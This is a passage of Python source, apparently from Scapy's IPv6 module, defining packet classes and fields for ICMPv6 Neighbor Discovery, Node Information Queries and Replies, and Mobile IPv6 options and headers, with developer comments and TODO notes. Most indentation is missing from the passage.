return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", "\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
#   requested in the mandatory target lladdr option and use it as the
#   Ethernet destination address when none is specified
# - that does not seem very practical if the user has to provide all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
# Required options: target lladdr, target address list
# Other valid options: MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform tests against real machines (a NOOP reply is proof of
#     implementation).
# [ ] Check if there are differences between different stacks: among *BSD,
#     with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). It should be possible to deactivate them.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
# Compute the NI group Address. Can take a FQDN as input parameter
def computeNIGroupAddr(name):
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
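# A minimal sketch: only the first label of the FQDN is hashed (lower-cased),
# so both names below map to the same NI group address.
def _nigroup_sketch():
    return (computeNIGroupAddr("host.example.com") ==
            computeNIGroupAddr("HOST.other.org"))   # -> True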
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided:
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ...): code is set to 0,
#   if not overridden by the user
# - IPv4 if acceptable for inet_pton(AF_INET, ...): code is set to 2,
#   if not overridden
# - Name in the other cases: code is set to 1, if not overridden by the user
#
# Internal storage is not only the value but a pair providing the type
# and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if type(x) is str:
if x and x[-1] == '\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = "\x00"
if n.count('.') == 0: # single-component gets one more
termin += '\x00'
n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin
res.append(n)
return "".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If provided string is already in printable format
(does not end with a null character, a one element list
is returned). Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
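# A quick round-trip illustration of the two helpers above (values can be
# checked by hand; single-label names get the extra trailing null byte):
#   >>> names2dnsrepr("ns.example.com")
#   '\x02ns\x07example\x03com\x00'
#   >>> dnsrepr2names('\x02ns\x07example\x03com\x00')
#   ['ns.example.com']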
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
        if type(x) is tuple and type(x[0]) is int:
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return "", (1, s)
def addfield(self, pkt, s, val):
if ((type(val) is tuple and val[1] is None) or
val is None):
val = (1, "")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
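# Typical use (hypothetical addresses): NIQueryDataField guesses the kind
# of value it is given, so queries can be built directly from a name or an
# address, e.g.:
#   >>> IPv6(dst="2001:db8::1")/ICMPv6NIQueryName(data="target.example.com")
#   >>> IPv6(dst="2001:db8::1")/ICMPv6NIQueryIPv6(data="2001:db8::1")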
_nireply_code = { 0: "Successful Reply",
                  1: "Response Refusal",
                  2: "Unknown query type" }  # code values per RFC 4620
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
#   (0, "some string") : unknown qtype values are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if type(x) is not tuple:
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if type(x) is str: # listify the string
x = [x]
if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if type(x) is str:
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if type(x) is str:
return (0, x)
return x
return (qtype, map(addttl, x))
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = ""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp))
elif t == 4:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, "")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
elif qtype == 2:
if len(s) < 4:
return s, (0, "")
ttl = struct.unpack("!I", s[:4])[0]
return "", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return "", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if type(x) is tuple and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
        if x == 0 and y == 0:
return 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
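# Worked example of the formula above: an option with an 8n+2 requirement
# (x=8, y=2) starting at current position 5 yields
# delta = 8*((5 - 2 + 8 - 1)/8) + 2 - 5 = 8*1 + 2 - 5 = 5, i.e. 5 bytes of
# padding (a PadN option) must be inserted before it, moving it to
# position 10 = 8*1 + 2.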
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
    x = 2 ; y = 0  # alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
                    ByteField('olen', 4),   # RFC 3775 Sect. 6.2.6: valid value is 4
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
                    ByteField('olen', 12),  # RFC 3775 Sect. 6.2.7: valid value is 12
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0)
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
        # delta from the NTP epoch (1900-01-01 00:00:00 UTC) to the Unix
        # epoch (1970-01-01): 70 years, i.e. 25567 days including 17 leap days
        delta = -2208988800
        i = int(x >> 32)
        j = float(x & 0xffffffff) * 2.0**-32
        res = i + j + delta
        from time import gmtime, strftime
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", '\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)/8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4]+struct.pack("!H", cksum)+p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", "\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if moboptcls.has_key(o):
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
        # Hack: BRR, BU and BA share the same hashret, which returns the
        # same value "\x00\x08\x09" (concatenation of mhtypes). This is
        # because we need to match BA with BU, and BU with BRR. --arno
return "\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", "\x00"*2, 2),
StrFixedLenField("cookie", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
